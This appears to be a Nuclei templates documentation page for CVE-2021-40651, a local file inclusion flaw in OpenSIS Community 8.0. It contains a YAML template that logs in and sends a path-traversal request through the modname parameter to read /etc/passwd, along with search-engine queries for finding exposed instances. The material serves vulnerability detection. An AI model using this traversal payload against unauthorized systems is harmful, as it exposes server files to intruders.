Skip to content
Nuclei Templates

OS4Ed OpenSIS Community 8.0 - Local File Inclusion

ID: CVE-2021-40651

Severity: medium

Author: ctflearner

Tags: cve,cve2021,lfi,os4ed,opensis,authenticated

Description

Section titled “Description”

OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server’s filesystem as long as the application has access to the file.

YAML Source

Section titled “YAML Source”
id: CVE-2021-40651


info:
  name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
  reference:
    - https://www.exploit-db.com/exploits/50259
    - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
    - https://www.youtube.com/watch?v=wFwlbXANRCo
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40651
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-40651
    cwe-id: CWE-22
    epss-score: 0.02562
    epss-percentile: 0.90208
    cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query:
      - "title:\"openSIS\""
      - http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2021,lfi,os4ed,opensis,authenticated


http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=


      - |
        GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(body_1, "openSIS")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502206e18e67bb9fe57de667588820bc2fd719d6646186b7a8b68b77fa0ae6392aa5a022100facc168371775ac3e92b7e91c974389d08689283be9f8fba102b7dadacdfdc7e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40651.yaml"

View on Github